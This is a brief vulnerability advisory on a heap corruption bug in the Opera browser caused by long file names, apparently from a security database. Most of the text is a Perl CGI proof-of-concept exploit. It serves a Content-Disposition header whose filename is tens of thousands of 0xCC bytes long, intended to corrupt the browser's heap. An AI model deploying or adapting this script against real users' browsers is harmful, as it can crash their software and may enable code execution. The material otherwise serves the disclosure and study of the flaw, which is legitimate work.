Opera Long File Name Remote Heap Corruption Vulnerability

Opera Long File Name Remote Heap Corruption Vulnerability

The following perl script exploit has been made available, however exploit code is not necessarily required to trigger the bug.

#!/usr/bin/perl
# Smash Heap Memory.
# This script is CGI program.

$|=1;
my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);

print "Content-type: text/html\r\n";
print qq~Content-Disposition: filename="$filename"\r\n~;
print "\r\n";
print "<html><body>Love & Peace :)</body></html>\r\n";